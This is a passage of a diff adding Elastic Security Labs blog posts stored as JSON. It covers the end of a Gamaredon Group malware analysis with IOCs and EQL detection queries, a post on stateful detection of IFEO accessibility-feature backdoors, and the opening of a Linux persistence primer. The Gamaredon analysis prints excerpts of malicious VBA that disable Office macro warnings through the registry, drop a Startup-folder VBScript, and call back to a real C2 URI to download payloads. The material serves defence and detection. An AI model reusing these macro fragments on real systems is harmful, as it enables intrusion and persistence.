a Russian speaker (Russian Author, Russian Language Code, Cyrillic character set, and the usage of Reanimator Extreme Edition). While we can use those as information to help inform overall analysis, this information can be seeded — so it doesn’t prove anything definitively on its own. In this case, this aligns with other open source analysis linking this to the Gamaredon Group, which is believed to be Russian in origin.\n\n| | |\n| ---------------------- | ----------------------------------------------------------------------- |\n| File Size | 46 kB |\n| File Type Extension | docx |\n| MIME Type | application/vnd.openxmlformats-officedocument.wordprocessingml.document |\n| Last Modified By | ШУРИК |\n| Revision Number | 2 |\n| Create Date | 2019:12:24 15:58:00Z |\n| Modify Date | 2019:12:24 16:10:00Z |\n| Template | pos.dot |\n| Total Edit Time | 2 minutes |\n| Pages | 1 |\n| Words | 195 |\n| Characters | 1114 |\n| Application | Microsoft Office Word |\n| Lines | 9 |\n| Paragraphs | 2 |\n| Company | Reanimator Extreme Edition |\n| Characters With Spaces | 1307 |\n\n_Figure 6 - Metadata from the lure document (truncated for length)_\n\n| | |\n| ---------------------- | -------------------------- |\n| File Size | 44 kB |\n| File Type Extension | doc |\n| MIME Type | application/msword |\n| Language Code | Russian |\n| Author | ШУРИК |\n| Template | pos.dot |\n| Last Modified By | ШУРИК |\n| Software | Microsoft Office Word |\n| Create Date | 2019:12:12 11:48:00 |\n| Modify Date | 2019:12:24 10:30:00 |\n| Code Page | Windows Cyrillic |\n| Company | Reanimator Extreme Edition |\n| Char Count With Spaces | 0 |\n| Revision Number | 5 |\n| Total Edit Time | 0 |\n| Words | 0 |\n| Characters | 0 |\n| Pages | 1 |\n| Paragraphs | 1 |\n| Lines | 1 |\n\n_Figure 7 - Metadata from the remote template (truncated for length)_\n\nWhile we cannot state with any authority, searching for the Author “ШУРИК” has identified similar TTPs (lure documents with remote template injection) as far back as September of 2019.\n\n## Macro code analysis\n\nThe macro code was obfuscated using string concatenation and procedurally generated variables — techniques that are often used to bypass static detection technologies. Upon execution, this code provides reverse shell functionality that allows an adversary access to the victim’s system and capability to access shared resources on their local network. Figure 8 contains an excerpt of the macro that depicts the creation of a reverse shell and some of the system information collected automatically.\n\n```\nDim NoARzTHy\nNoARzTHy = \"Set WShell=CreateObject(\"\"WSc\" + \"ri\" + \"pt.S\" + \"hel\" + \"l\"\")\"\nSet PWFJWatF = CreateObject(\"WScr\" + \"ipt.Ne\" + \"two\" + \"rk\")\nDim pbuvwTLK, JzESywut\nSet GGZucIZE = CreateObject(\"Sc\" + \"rip\" + \"ting.Fi\" + \"leSy\" + \"stemOb\" + \"ject\")\npbuvwTLK = GGZucIZE.Drives(Environ(\"Syst\" + \"emDri\" + \"ve\")).SerialNumber\nOYTgBXAP = PWFJWatF.ComputerName\n```\n\n_Figure 8 - First 7 lines of macro code from the loaded document template_\n\nFigure 9 shows an excerpt of the same code removing the concatenation.\n\n```\nDim NoARzTHy\nNoARzTHy = \"Set WShell=CreateObject(\"WScript.Shell\")\"\nSet PWFJWatF = CreateObject(\"WScript.Network\")\nDim pbuvwTLK, JzESywut\nSet GGZucIZE = CreateObject(\"Scripting.FileSystemObject\")\npbuvwTLK = GGZucIZE.Drives(Environ(\"SystemDrive\")).SerialNumber\nOYTgBXAP = PWFJWatF.ComputerName\n```\n\n_Figure 9 - First 7 lines of macro code - Removal of concatenation_\n\nThe serial number and hostname of the victim's computer are some of the first pieces of information the VBA collects. They are converted to hexadecimal and included in the reverse shell HTTP request to identify both the implant and the victim. Figure 10 shows off the configuration of the URI request within the macro and Figure 11 represents an example URI.\n\n```\nJzESywut = \"h\" + \"tt\" + \"p:\" + \"//l\" + \"ibcr\" + \"ash.dd\" + \"ns.ne\" + \"t/\" & OYTgBXAP & \"_\" & HFzesifc & \"//po\" + \"sol\" + \"re\" + \"boo\" + \"t.ph\" + \"p\"\n```\n\n_Figure 10 - URI request configuration - Macro_\n\n```\nJzESywut = hxxp://libcrash.ddns[.]net/ENDPOINT1_96L02G3D//posolreboot.php\n```\n\n_Figure 11 - URI request configuration - Example_\n\nBy default, Microsoft disables external or untrusted macros by setting key values in the registry at HKCU\\Software\\Microsoft\\Office\\(VERSION)\\Word\\Security\\. The first registry modification made by this macro changes the key value of AccessVBOM to 1, effectively bypassing the default setting to enable external or untrusted macros. The second registry modification enables all macros automatically and disables warnings for future macro-enabled objects. Figure 12 represents the macro code for these registry modifications.\n\n```\nFEDzCjgi$ = \"HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\" & Application.Version & _\"\\Word\\Security\\\"\nCreateObject(\"WScript.Shell\").RegWrite FEDzCjgi$ & \"AccessVBOM\", 1, \"REG_DWORD\"\nCreateObject(\"WScript.Shell\").RegWrite FEDzCjgi$ & \"VBAWarnings\", 1, \"REG_DWORD\"\n```\n\n_Figure 12 - Registry modifications found in macro_\n\nThe remaining lines of code end up writing a VBScript file and placing it in the user’s startup directory. Figure 13 contains an excerpt of the beginning lines of macro code where the VBScript (security.vbs) is written to disk and placed in the startup folder.\n\n```\nDim LISPVdZd As Object\nSet LISPVdZd = GGZucIZE.CreateTextFile(FESHWDaD + \"\\Mi\" + \"croso\" + \"ft\\Wi\" + \"ndow\" + \"s\\St\" + \"art Men\" + \"u\\Pro\" + \"grams\\Sta\" + \"rtup\\secur\" + \"ity.v\" + \"b\" + \"s\", True, True)\n```\n\n_Figure 13 - Macro code writing VBScript file (security.vbs)_\n\nUpon rebooting or successfully authenticating to an infected system, the persistent VBScript file is automatically executed and a standard HTTP GET is made with the previously observed URI (Figure 14). If the request is successful, the response body gets stored into another variable. This functionality appears to serve as a downloader that has specific subroutine instructions for reassembling a binary on disk. Figure 14 contains an excerpt of the function used to construct the HTTP GET request.\n\n```\nFunction TOGeMFBD(iWotBBKf)\nOn Error Resume Next\nSet EXJJrRlN = CreateObject(\"MSXML2.XMLHTTP\")\nWith EXJJrRlN\n.Open \"GET\", iWotBBKf, False\n.send\nEnd With\nIf EXJJrRlN.Status = 200 Then\nTOGeMFBD = EXJJrRlN.ResponseBody\nEnd If\nEnd Function\n```\n\n_Figure 14 - GET request (security.vbs)_\n\nDuring dynamic analysis, analysts identified that the script enters a loop while sending the request. A 0-byte file is created under the infected user’s roaming profile with a procedurally generated file name and text file extension. The file is iteratively written and deleted without the contents changing.\n\nAnalysts have not confirmed the purpose of this file, and suspect it is used to reassemble a segmented later-stage implant. Potential reasons to obfuscate this process include evading detection and response solutions.\n\n## Pteranodon update\n\nWhile doing this research, we observed samples and artifacts that appear to be related to an updated version of the Gamaredon Group’s custom backdoor, known as [Pteranodon](https://attack.mitre.org/software/S0147/). Although we don’t have substantial evidence that Pteranodon is the final payload victims are infected with during this campaign, we assess with moderate confidence that this activity is linked to Gamaredon Group.\n\nThree PE samples were uploaded to VirusTotal last month with each dropping two text files ([ExcelMyMacros.vba](https://www.virustotal.com/gui/file/c4089686965df5e52105b6eac06703aa11c4891695278446370f623d531b505e/details), [wordMacros.vba](https://www.virustotal.com/gui/file/02e6e2bfaaf6e77cfaccadaf26167135c53cf2c934d17c5a83e5bbcadd85b47d/details)). The two text files share several similarities to the VBA macro code found in the remote templates used in this campaign — specifically, the methods of retrieving and hex-encoding the serial number and similar subroutine logic. Figure 15 depicts the VBA macro code from the remote template on the left and the dropped VBA macro code from a known Pteranodon implant on the right.\n\n**VBA from Campaign**\n\n```\nFor LfJesrvH = 0 To UBound( IvAPFGDD )\" + vbCrLf\nLISPVdZd.Write \"IvAPFGDD(LfJesrvH) = Asc( Mid( EaCJFwPc, LfJesrvH + 1, 1 ) )\" + vbCrLf\nLISPVdZd.Write \"Next\" + vbCrLf\nLISPVdZd.Write \"GetFEDzCjgi = IvAPFGDD\" + vbCrLf\n```\n\n**VBA from Pteranodon**\n\n```\nFor i = 0 To UBound( asrrCodes )\" + vbCrLf\nNewVDJKpCBSFile.Write \" asrrCodes(i) = Asc( Mid( myPassPhrase, i + 1, 1 ) )\" + vbCrLf\nNewVDJKpCBSFile.Write \" Next\" + vbCrLf\nNewVDJKpCBSFile.Write \" GetKey = asrrCodes\" + vbCrLf\n```\n\n_Figure 15 - Macro comparison - VBA from Campaign (top) vs VBA from Pteranodon (bottom)_\n\nBoth text files contained VBA, and had the same functionality for disabling macro warnings, creating a persistent VBScript in the startup folder and establishing connections to C2. What’s interesting with the dropped text files (VBA), is that they show the true variable names used by the developers before their tooling obfuscates the variables. At the time of this writing, each of the four C2 servers (see attached indicators) affiliated with Pteranodon samples were currently active and hosted a network allocated to ASN9123 (TIMEWEB LTD). Macro code associated with the Gamaredon Group campaign targeting Ukraninan officials called back to C2 hosted in the same network.\n\nAn interesting change in some of these artifacts appears to be the adoption of .NET. Along with the two text files containing VBA code, there are three dropped DLL’s (Microsoft.Office.Interop.Excel.dll, Microsoft.Office.Interop.Word.dll, Microsoft.Vbe.Interop.dll) and a .NET [sample](https://www.virustotal.com/gui/file/145a61a14ec6d32b105a6279cd943317b41f1d27f21ac64df61bcdd464868edd/details) showing dependencies with these files. Figure 16 shows a hex-encoded reference to one of the VBA files (wordMacros.txt). Based on these observations, it’s intriguing to see Gamaredon Group continue to leverage core functionality of their VBA stager code, but in a new method of execution by using .NET\n\n\n\n_Figure 16 - .NET reference to “wordMacros.txt”_\n\n## Detection crafting\n\nFor organizations interested in detecting TTPs discussed in this blog post, detection logic has been provided for the following categories:\n\n### Dynamic DNS\n\n[Dynamic DNS](https://attack.mitre.org/techniques/T1311/) enables adversaries to rapidly provision very large numbers of records that map back to their infrastructure, creating a confusion layer between victims and adversaries. Gamaredon Group exclusively used Dynamic DNS locations for remotely hosted templates, rotating domains consistently, and leveraging separate infrastructure for hosting stagers and templates.\n\nProfiling Dynamic DNS for your enterprise is an amazing way to get started hunting — not just to baseline and build environmental awareness, but also to outright find evil. We will primarily focus on the two Dynamic DNS providers observed in relation to this campaign. If you need inspiration, consider counting up all non-browser processes that made a DNS request to one of these Dynamic DNS providers as shown in Figure 17.\n\n```\ndns where wildcard(query_name, \"*.ddns.net\", \"*.hopto.org\", \"*.bounceme.net\") and\nprocess_name not in (\"chrome.exe\",\"iexplore.exe\", \"firefox.exe\")\n| count process_name, query_name\n```\n\n_Figure 17 - EQL Query - Count of non-browser process to dynamic DNS providers_\n\nAnother option examines the processes that most frequently communicate with these providers, and may provide more context regarding how dynamic DNS is used in your environment, or enable an analyst to find signs of other malicious activity.\n\n```\nnetwork where event of\n[dns where wildcard(query_name, \"*.ddns.net\", \"*.hopto.org\", \"*.bounceme.net\")\n| count process_name, total_in_bytes, total_out_bytes\n```\n\n_Figure 18 - EQL query - Network traffic of processes to dynamic DNS providers_\n\n### Template Injection\n\nSpearphishing attachments that utilize [template injection](https://attack.mitre.org/techniques/T1221/) may bypass security controls because they contain no embedded VBA code. The attached document retrieves a remotely hosted template where the malicious VBA code resides. In order to detect this activity dynamically, analyze DNS and network traffic over common protocols (HTTP/HTTPS/SMB) and processes generated by Microsoft Office applications. Enterprise defenders may need to whitelist any legitimate use of remotely hosted templates, or any benign network activity to Microsoft infrastructure. Below is an example EQL query focused on new process creation events from Office products that also made DNS requests outside our whitelist.\n\n```\nsequence by unique_pid\n[process where process_name in (\"winword.exe\", \"excel.exe\", \"powerpnt.exe\")]\n[dns where not wildcard(query_name , \"*.microsoft.com\", \"*.skype.com\")]\n```\n\n_Figure 19 - EQL query - DNS traffic from Office applications_\n\nSome enhancements we can use with the previous query is to add a network event to the sequence as well as look for a spawned child process bringing in more context to the detection.\n\n```\nsequence\n[process where process_name in (\"winword.exe\", \"excel.exe\", \"powerpnt.exe\")] by unique_pid\n[dns where not wildcard(query_name, \"*.microsoft.com\", \"*.skype.com\")] by unique_pid\n[network where true] by unique_pid\n[process where subtype.create] by unique_ppid\n```\n\n_Figure 20 - EQL query - Network traffic making dynamic DNS requests from Office applications_\n\nIf we wanted to tailor a sequence-based detection to the Gamaredon Group activity specifically, we can bring in the previous Dynamic DNS providers, which creates a more restrictive filter.\n\n```\nsequence by unique_pid\n[process where process_name in (\"winword.exe\", \"excel.exe\", \"powerpnt.exe\")]\n[network where event of\n[dns where wildcard(query_name, \"*.ddns.net\", \"*.hopto.org\", \"*.bounceme.net\")]]\n```\n\n_Figure 21 - EQL query - Network traffic making dynamic DNS requests from Office applications_\n\nAcross a range of features provided by the Elastic Endpoint, this attack is prevented through different machine-learning technologies to stop advanced threats such as macro-enabled documents and malicious binaries. Along with these protections, we can take nearly any EQL logic and deploy it in prevention mode to completely stop an attack such as in this example with the download and execution of the remote template. Here’s a short clip in action:\n\n\n\n### Malicious registry configuration\n\nIn order for adversaries to be effective in their mission, they often create their own opportunities. In this case, the adversary reconfigured the target endpoint in order to disable macro security warnings and trust future macros automatically. These small changes can end up having larger implications, and defenders can look for them as symptoms of more serious security issues. For example, these same techniques have also been associated with threat groups like APT32 and are leveraged by malware families such as [AgentTesla](https://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html) and [BabyShark](https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/).\n\nThis query looks for evidence of the registry modifications that disable warnings for macros and automatically enabling future macros:\n\n```\nregistry where registry_data == 1 and wildcard(registry_path,\n\"*\\\\Software\\\\Microsoft\\\\Office\\\\*\\\\Word\\\\Security\\\\AccessVBOM\",\n\"*\\\\Software\\\\Microsoft\\\\Office\\\\*\\\\Word\\\\Security\\\\VBAWarnings\")\n```\n\n_Figure 22 - EQL query - Registry modifications around disabling macro security features_\n\nThat would function perfectly well as a standalone detection, but EQL allows us to look for both the registry modification and template injection techniques in this example query:\n\n```\nsequence by unique_pid\n[process where process_name in (\"winword.exe\", \"excel.exe\", \"powerpnt.exe\")]\n[registry where registry_data == 1 and wildcard(registry_path,\n\"*\\\\Software\\\\Microsoft\\\\Office\\\\*\\\\Word\\\\Security\\\\AccessVBOM\",\n\"*\\\\Software\\\\Microsoft\\\\Office\\\\*\\\\Word\\\\Security\\\\VBAWarnings\")]\n[registry where registry_data == 1 and wildcard(registry_path,\n\"*\\\\Software\\\\Microsoft\\\\Office\\\\*\\\\Word\\\\Security\\\\AccessVBOM\",\n\"*\\\\Software\\\\Microsoft\\\\Office\\\\*\\\\Word\\\\Security\\\\VBAWarnings\")]\n```\n\n_Figure 23 - EQL query - Registry modifications around disabling macro security features_\n\n### Persistence startup\n\nGamaredon Group leveraged both malicious Windows shortcut files and script objects written to the [Startup folder](https://attack.mitre.org/techniques/T1060/) for persistence. This technique is very effective in spite of its simplicity and continues to be popular among adversaries. One of the first places to start building detection logic would be to inquire about processes that write files to the startup folder.\n\n```\nfile where subtype.create\nand (\nfile_path == \"*\\\\Programs\\\\Startup\\\\*.lnk\" or\nfile_path == \"*\\\\Programs\\\\Startup\\\\*.vbs\"\n)\n| count process_name, file_path, user_name\n```\n\n_Figure 24 - EQL query - Monitoring file writes to startup folder_\n\nTo take it a bit further, we can also customize detection logic to include the VBScript execution at logon. This is a great example for building a sequenced-based signal, as we will track the adversary’s activity over an extended period of time — such as 90 days. Once the machine is rebooted or the user logs back in, an alert can be generated when WScript executes the VBScript file at startup.\n\n```\nsequence with maxspan=90d\n[file where subtype.create and file_path == \"*\\\\Programs\\\\Startup\\\\*.vbs\"]\n[process where subtype.create and parent_process_name==\"explorer.exe\" and\nprocess_name == “wscript.exe” and command_line == \"*\\\\Programs\\\\Startup\\\\*\"]\n```\n\n_Figure 25 - EQL query - Monitoring execution of startup processes_\n\n## Conclusion\n\nIn this post, we reviewed recent campaign TTPs tied to an adversary known publicly as Gamaredon Group. This group is likely to have been active since at least 2013 and has engaged in an ongoing campaign against Ukraine at the time of this writing. We highlighted some of their current techniques such as template injection and the use of Dynamic DNS providers, the macro code found in a recent sample, and updates to their custom backdoor known as Pteranodon. By using [EQL](https://www.elastic.co/blog/introducing-event-query-language), we also shared hunting and detection strategies around four specific techniques used by Gamaredon Group.\n\nWe hope that by sharing some of these insights and queries, we can help raise awareness and continue to focus on protecting the world's data from attacks. To enable organizations further, we’ve added all the Indicators of Compromise (IOCs) below and added the queries in this post into the [EQLLib repository](https://eqllib.readthedocs.io/en/latest/analytics.html).\n\nInterested in using Elastic Security? Try [Elastic SIEM](https://www.elastic.co/siem) for free.\n\nPlus, [EQL support is being added to Elasticsearch](https://github.com/elastic/elasticsearch/issues/49581)!\n\n## Indicators of Compromise (IOCs)\n\n| | |\n| ----------------------------------------- | ------------------------------------------------------------------ |\n| Lure Document SHA-256 | 86e0701349903105b0c346df9485dd59d85dd9463c2bee46d974ea1b1d7059d4 |\n| Remote Template (pos.dot) SHA-256 | feb0596e9735e03ae929d9b5ee862da19e16e5cdf57dd2a795205e591a55940f |\n| Remote Template from Lure Document Domain | document-out[.]hopto[.]org/pos[.]dot |\n| Remote Template Hosting IP | 141[.]8[.]195[.]60 |\n| Remote Template Hosting IP | 141[.]8[.]192[.]153 |\n| System Information Upload IP | 188[.]225[.]25[.]50 |\n| System Information Upload URI | libcrash.ddns[.]net/\\{Computername_SerialNumber\\}//posolreboot.php |\n| ExcelMyMacros.vba SHA-256 | c4089686965df5e52105b6eac06703aa11c4891695278446370f623d531b505e |\n| wordMacros.vba SHA-256 | 02e6e2bfaaf6e77cfaccadaf26167135c53cf2c934d17c5a83e5bbcadd85b47d |\n| ExcelMyMacros.txt SHA-256 | 2f310c5b16620d9f6e5d93db52607f21040b4829aa6110e22ac55fab659e9fa1 |\n| Pteranodon SHA-256 | c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f |\n| Pteranodon SHA-256 | 145a61a14ec6d32b105a6279cd943317b41f1d27f21ac64df61bcdd464868edd |\n| Pteranodon Domain | beercraft[.]space |\n| Pteranodon Domain | skymage[.]fun |\n| Pteranodon Domain | masseffect[.]space |\n| Pteranodon Domain | masseffect[.]website |\n| Pteranodon IP | 185[.]200[.]241[.]88 |\n| Pteranodon IP | 188[.]225[.]46[.]94 |\n\n## References\n\n1. [https://www.anomali.com/resources/whitepapers/malicious-activity-aligning-with-gamaredon-ttps-targets-ukraine](https://www.anomali.com/resources/whitepapers/malicious-activity-aligning-with-gamaredon-ttps-targets-ukraine)\n"
+ },
+ "title": "Playing defense against Gamaredon Group",
+ "slug": "playing-defense-against-gamaredon-group",
+ "date": "2022-06-21",
+ "description": "Learn about the recent campaign of a Russia-based threat group known as Gamaredon Group. This post will review these details and provide detection strategies.",
+ "author": [
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "andrew-pease"
+ },
+ {
+ "slug": "seth-goodwin"
+ },
+ {
+ "slug": "elastic-security-intelligence-analytics-team"
+ }
+ ],
+ "image": "blog-thumb-digital-shield.jpg",
+ "category": [
+ {
+ "slug": "activity-group"
+ }
+ ]
+ },
+ "id": "security_labs_content-playing_defense_against_gamaredon_group-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-practical_security_engineering_stateful_detection-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-practical_security_engineering_stateful_detection-md.json
new file mode 100644
index 00000000000..761a9b7b0cb
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-practical_security_engineering_stateful_detection-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Practical security engineering: Stateful detection\"\nslug: \"practical-security-engineering-stateful-detection\"\ndate: \"2022-06-01\"\ndescription: \"By formalizing stateful detection in your rules, as well as your engineering process, you increase your detection coverage over future and past matches. In this blog post, learn why stateful detection is an important concept to implement.\"\nauthor:\n - slug: samir-bousseaden\nimage: \"blog-thumb-digital-shield.jpg\"\ncategory:\n - slug: security-research\n---\n\nDetection engineering at Elastic is both a set of reliable principles — or methodologies — and a collection of effective tools. In this series, we’ll share some of the foundational concepts that we’ve discovered over time to deliver resilient detection logic.\n\nIn this blog post, we will share a concept we call **stateful detection** and explain why it's important for detection.\n\n## Detection states\n\nThe quickest way to get started may not always be the best, and new analysts tend to jump right into the post-exploitation details, mapping available data sources and logic fragments. Few consider that the state of a technique may influence visibility. The following three states illustrate one operations-focused approach:\n\n- **Creation state** : Related to detecting suspicious or critical activity at the time of configuration or preparation (e.g., creation or modification of a new Run key registry value to detect new persistent programs)\n- **Runtime state:** Related to detecting suspicious or critical activity at the moment of execution, which may be the result of an automated process (e.g., after a program was added to the HKLM RunOnce key, it will be executed as a child process of RunOnce.exe at system startup)\n- **Cleanup state:** A special kind of runtime state related to detecting active and passive methods of covering tracks (files, registry deletion, and process termination are examples of needed telemetry; e.g., delete startup entry)\n\nMany organizations tasked with creating detection logic focus on a given event creation state, though the following limitations are often overlooked.\n\n- There will be detection gaps for known tactics, techniques, and procedures (TTPs) at execution. It’s likely you’re dealing with creation-state detection logic built for these TTPs, meaning you’re only finding this behavior after the fact.\n- There will be detection gaps for techniques used by attackers who are diligent at tidying up their presence, as security operations tend to focus on detecting techniques in the earliest stages of an intrusion.\n- The required telemetry, data, and logic for one technique may be different for each state and require enabling new telemetry or changing existing configurations.\n\nThe practical application of this concept is most effective for detecting techniques in tactic categories that focus on predictable outcomes such as persistence, defense evasion (e.g., abnormal memory type and protection for code injection), and command and control (unusual process network traffic).\n\nTo make this concept clearer, let's explore an example of designing detection logic in the [Persistence](https://attack.mitre.org/tactics/TA0003/) tactic category using [T1015 - Accessibility Features](https://attack.mitre.org/techniques/T1015/). Suppose an attacker has already enabled a backdoor to execute using this technique (via Image File Execution Options - Debugger registry value) months or weeks before you’ve implemented a detection for it.\n\n\n\n_Figure 1: Depiction of image file execution options debugger abuse (1)_\n\nImage File Execution Options (IFEO) are used for debugging legitimate applications, and can be abused by an attacker with at least local administrator privileges to execute a malicious program (instead of a legitimate one) via the Debugger setting. As shown in Figure 2, cmd.exe will be executed every time the on-screen keyboard (osk.exe) is invoked, providing the attacker a system shell backdoor.\n\n\n\n_Figure 2: Depiction of image file execution options debugger abuse (2)_\n\n## **Creation state**\n\nAt the time of creation, while configuring the Debugger value, detection primarily consists of monitoring a filtered subset of the registry for new references to accessibility features (e.g., osk.exe for the On-Screen Keyboard) and the registry value name Debugger. This technique is also effective for other accessibility features depicted in Figure 3.\n\n\n\n_Figure 3: Accessibility features processes_\n\n[EQL](https://www.elastic.co/guide/en/elasticsearch/reference/master/eql.html) is a language we can use to broadly describe **creation-state** detection events for any technique. Figure 4 depicts an EQL rule demonstrating one example that detects [accessibility features](https://attack.mitre.org/techniques/T1015/) using IFEO.\n\n\n\n_Figure 4: T1015 - IFEO creation state EQL example_\n\n## **Runtime state**\n\nAt the time of creation, that kind of EQL logic will help to detect the technique, but what if the configuration happened _weeks or months ago_? A different kind of EQL expression is better suited for detecting the technique in a runtime state. It begins with a little focused research.\n\nIt can help to adopt a structured approach to researching this state:\n\n1. Understand normal execution flow: Manually execute each accessibility feature, recording normal process lineage, attributes, and execution flow\n\n1. Document consistent parent process, process command line arguments, privilege characteristics, and process ancestry\n1. Identify hijack opportunities\n\n1. As an example, while it may be possible to configure a debugger for osk.exe, is it possible to configure one for utilman.exe, the parent of osk.exe?\n1. Hunt unique anomalies\n\n1. Identify observable characteristics of IFEO Debugger hijacking to differentiate between legitimate and malicious use of this technique (e.g., abnormal child of winlogon.exe could be caused by code injection and unrelated to T1015)\n1. Create a **runtime-state** detection EQL rule, evaluate potential fixes to any **creation-state** detection EQL logic\n\nLet’s dig into each of these steps so that you can better understand how this process can be adapted to work with your own team.\n\n### **Understand normal execution flow**\n\nFor osk.exe, sethc.exe, magnify.exe, and narrator.exe, the expected parent process is utilman.exe. Figure 5 depicts a visualization of the normal process-tree for the on-screen keyboard accessibility feature.\n\n\n\n_Figure 5: Example of normal on-screen keyboard execution_\n\nFor sethc.exe (Sticky Keys), which can be invoked by pressing the SHIFT key five times, expected parent processes are ATBroker.exe, utilman.exe, and winlogon.exe. For Displayswitch.exe, a similarly debuggable accessibility feature that can be invoked by pressing the WIN and P keys, expected parents are svchost.exe (DCOM service not useful in the context of T1015) and winlogon.exe.\n\nUnderstanding **normal** execution will be helpful as you begin to explore less-expected execution. If we jumped right to [MITRE ATT&CK®](https://attack.mitre.org/) before analyzing normal behavior and then tried to write a rule, we wouldn’t have some of the essential context and our logic would be less effective.\n\n### **Identifying hijacking possibilities**\n\nWhile we have our benevolent researcher hats on, let’s consider how we might abuse this kind of normal execution. We can infer at least a few options to start with:\n\n- Attempt to abuse execution of an accessibility application (e.g., osk.exe, magnify.exe, narrator.exe) by configuring a debugger IFEO flag\n- Attempt to abuse execution of an expected non system critical parent process (e.g., utilman.exe, atbroker.exe), which is a bit more of a shot in the dark\n\nThat’s a pretty narrowly scoped set of options for now; directly abusing accessibility applications is straightforward and a good place to start.\n\n### **Hunting unique anomalies**\n\nWe need to configure our own IFEO Debugger value for each of the known accessibility feature applications, which helps highlight noteworthy toolmarks. The table below depicts commandline arguments and process ancestry observed when our benign IFEO Debugger (set to cmd.exe) was triggered. There are some clear patterns in the command_line and parent_process_path values, as shown in Figure 6.\n\n\n\n_Figure 6: T1015 - IFEO Runtime-State Anomalies (1)_\n\nThis pattern can be translated into the following **runtime-state** detection, depicted using EQL in Figure 7.\n\n\n\n_Figure 7: T1015 - IFEO Runtime-State Detection EQL (1)_\n\nNow that we’ve covered the direct abuse, what happens when we try to manipulate one of the expected parent processes? Figure 8 contains a few attempts at abusing the expected parent processes of accessibility features.\n\n\n\n_Figure 8: T1015 - IFEO Runtime State Anomalies (2)_\n\nAs is illustrated in the previous figure, the same anomaly type can be translated to the **runtime-state** detection EQL in Figure 9.\n\n\n\n_Figure 9: T1015 - IFEO runtime-state detection EQL (2)_\n\n**Tip:** Be careful about making exceptions too broad in hunting queries. Favor PE information over process metadata when you can, and join that with signing status for low-hanging fruit.\n\nFigure 10 depicts the graphical timeline of a **runtime-state** alert, which can detect the use of an existing T1015 backdoor.\n\n\n\n_Figure 10: T1015 - IFEO runtime-state alert example_\n\n## **Cleanup state**\n\nDetection logic for this state is often the opposite of the **creation-state** logic. Below is an example for osk.exe IFEO key deletion as logged by [sysmon](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon).\n\n\n\n_Figure 11: T1015 - IFEO cleanup-state sysmon event example_\n\nWhat significant lessons should we take away?\n\n- **runtime-state** detection requires different data (e.g., enable telemetry for child processes of utilman.exe and winlogon.exe in your sysmon configuration, use commandline value to differentiate between abnormal child processes and T1015 unique artifacts)\n- **cleanup-state** detection requires different data (e.g., registry deletion, process termination)\n- Adjust **creation-state** EQL rule by adding atbroker.exe and utilman.exe (can be abused as well)\n\n## **Beyond baseline**\n\nFor the same technique, other than monitoring files overwrite ( **creation-state** ) and process masquerading as accessibility features ( **runtime-state** ), we can also hunt and alert ( **runtime-state** ) proactively on any unusual child processes (or suspicious non-Microsoft image loads to detect [potential Image hijack](https://iwantmore.pizza/posts/arbitrary-write-accessibility-tools.html)) of the accessibility features processes (osk.exe, narrator.exe, magnify.exe, sethc.exe, and DisplaySwitch.exe) — the majority of which are **childless** processes.\n\n\n\n_Figure 12: T1015 - unusual accessibility feature child process_\n\n## **Conclusion**\n\nWhen assessing existing or designing new detection logic, always ask yourself how a specific technique/procedure manifests itself at the three different states before marking a specific attack procedure as covered. This impacts the type of data sources and the logic details you will need to build state resilient detections\n\nActively scanning for existing matches to creation-state logic is an option (often used during compromise assessment), but this is not applicable to near real-time detection. It’s not always applicable to create detection for specific states (e.g., high performance impact, difficulty to obtain right telemetry). By formalizing the stateful-detection concept in your rules, as well as your use cases engineering process, you increase your detection coverage in time (future and past matches).\n\nWant to give [Elastic Security](https://www.elastic.co/security) a spin? Try it free today, or experience our latest version on [Elasticsearch Service](https://www.elastic.co/elasticsearch/service) on Elastic Cloud.\n"
+ },
+ "title": "Practical security engineering: Stateful detection",
+ "slug": "practical-security-engineering-stateful-detection",
+ "date": "2022-06-01",
+ "description": "By formalizing stateful detection in your rules, as well as your engineering process, you increase your detection coverage over future and past matches. In this blog post, learn why stateful detection is an important concept to implement.",
+ "author": [
+ {
+ "slug": "samir-bousseaden"
+ }
+ ],
+ "image": "blog-thumb-digital-shield.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ]
+ },
+ "id": "security_labs_content-practical_security_engineering_stateful_detection-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-primer_on_persistence_mechanisms-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-primer_on_persistence_mechanisms-md.json
new file mode 100644
index 00000000000..2e8c0607fda
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-primer_on_persistence_mechanisms-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Linux Detection Engineering - A primer on persistence mechanisms\"\nslug: \"primer-on-persistence-mechanisms\"\ndate: \"2024-08-21\"\nsubtitle: \"A walkthrough on how threat actors establish persistence on Linux systems and how to hunt for these techniques.\"\ndescription: \"In this second part of the Linux Detection Engineering series, we map multiple Linux persistence mechanisms to the MITRE ATT&CK framework, explain how they work, and how to detect them.\"\nauthor:\n - slug: ruben-groenewoud\nimage: \"primer-on-persistence-mechanisms.jpg\"\ncategory:\n - slug: detection-science\ntags:\n - linux\n - persistence\n---\n\n## Introduction\n\nIn this second part of the Linux Detection Engineering series, we'll examine Linux persistence mechanisms in detail, starting with common or straightforward methods and moving toward more complex or obscure techniques. The goal is to educate defenders and security researchers on the foundational aspects of Linux persistence techniques by examining both trivial and more complicated methods, understanding how these methods work, how to hunt for them, and how to develop effective detection strategies.\n\nFor those who missed the first part, \"Linux Detection Engineering with Auditd\", it can be found [here](https://www.elastic.co/security-labs/linux-detection-engineering-with-auditd).\n\nFor this installment, we'll set up the persistence mechanisms, analyze the logs, and observe the potential detection opportunities. To aid in this process, we’re sharing 